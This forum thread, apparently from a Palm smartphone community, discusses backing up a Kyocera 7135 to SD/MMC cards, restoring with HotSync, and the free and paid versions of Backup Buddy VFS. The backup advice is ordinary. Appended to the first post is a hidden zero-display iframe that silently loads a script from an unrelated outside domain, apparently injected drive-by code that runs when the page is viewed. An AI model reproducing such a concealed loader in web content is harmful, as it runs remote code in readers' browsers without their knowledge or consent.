+ Reply to Thread
Page 1 of 2 1 2 LastLast

Backup on MMc or SD card info

Although you will not be able to back up the phone entirely on an MMC or SD card, you are able to back up applications and files. In addition, performing another HotSync following a hard reset should bring your current information back to the phone. In your Palm folder on your computer, you will have a file titled "Saved_Preferences". If you HotSync again, this file acts as a back up. It is not necessary to edit or move this folder. In addition, if you are away from your computer and need to perform a hard reset, you can perform a network HotSync, which will enable you to sync information away from the computer.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Has anybody tried a Palm Baclup SD card? They are 16 mb and have a backup/restore app right on the card. Do they backup everything? I thought they did. And are there any benefits of this over say backup buddy vfs?
    iPhone therefore iAm.

wept, I am unsure what you are trying to explain here. I back up everything to the SD/MMC slot. Everything means everything not in ROM. Why would anyone need to back up ROM.

Yes, a hotsync operation restores everything, but you have to waiut until you get back to your PC. I restore from my card which gets an automatic update every morning.

I sync with both my card and PC daily.

HoTSync - how do backup to the SC card?

the 7135 comes with a free version of BackupBuddyVFS on the CD.

Originally posted by HoTSynC
    So it comes with the free version, that doesn't allow scheduling of automatic backups? Or did you mean that it comes with a free copy of the full version?
    Sorry, but I no longer make 7135 headset adapters.

Hotsync,
    Where is this on the CD? I didn't see it under the "Additional Applications". I already had registered it over a year ago so I'm wondering if it got installed on top of what I had during the desktop install.

Originally posted by Beryl
    Hotsync,
    Where is this on the CD? I didn't see it under the "Additional Applications". I already had registered it over a year ago so I'm wondering if it got installed on top of what I had during the desktop install.
    It's actually not on the CD, there is a link to free trials at HandanGo on the CD.

See "R:7135Additional AppsTrial Applications" on your CD.

Alan

Of course sub your CD rom drive letter in place of alanb's "R:"

Free trial - that makes sense. Thanks!

will my JB Backup from Hand fort work?
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by Beryl
    Free trial - that makes sense. Thanks!
    For Backup Buddy VFS, it is actually the free version, not free trial. It is fully functional and does not expire, but the paid version adds features. Specifically, the paid version is faster and you can schedule backups. The free version you need to manually start the backup.

Alan

Originally posted by alanb
    For Backup Buddy VFS, it is actually the free version, not free trial. It is fully functional and does not expire, but the paid version adds features. Specifically, the paid version is faster and you can schedule backups. The free version you need to manually start the backup.
    Not if you use a program like Crony

http://mikewren.com

Originally posted by MikeW
    Cool.... There is just SO much available for Palm. I have been using Palm's since they were called Palm Pilots, and I still only know about a fraction of the software available....

Alan

Originally posted by MikeW
    Crony won't help you here. Sure it can start the backup for you, however it can't make the back up incrimental. Each backup withthe free version is a full back up taking about 30-45 seconds a MB. With incrimental, it only backs up what has changed since the last back up.

Crony won't help you here. Sure it can start the backup for you, however it can't make the back up incrimental. Each backup withthe free version is a full back up taking about 30-45 seconds a MB. With incrimental, it only backs up what has changed since the last back up.
    I knew I was forgetting a feature of the paid version. Of course, if I schedule the backup for the middle of the night, do I really care whether it is full or incremental?

It is a great program though, so I will probably buy the full version rather then trying a free workaround just because I think the author deserves the support.

Alan

How do you restore with the free version that comes with the 7135, assuming you do a hard reset?

Originally posted by richard
    How do you restore with the free version that comes with the 7135, assuming you do a hard reset?
    The first time you run it, it will ask if you want to install a copy of hte applicatoin onto your SD card. After a hard reset, it will still be on the SD card, so you just start the application on the card, and select Restore.

Works great.

Alan

Ahh! I see that there are two instances of the software and one is on the card. Now I understand. Thanks very much!

BBVFS does work nicely.

I never scheduled backups before and only used BBVFS before going on trips. I'm planning to take advantage of this feature going forward though.

I also like how the desktop BB handles backing up the card.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135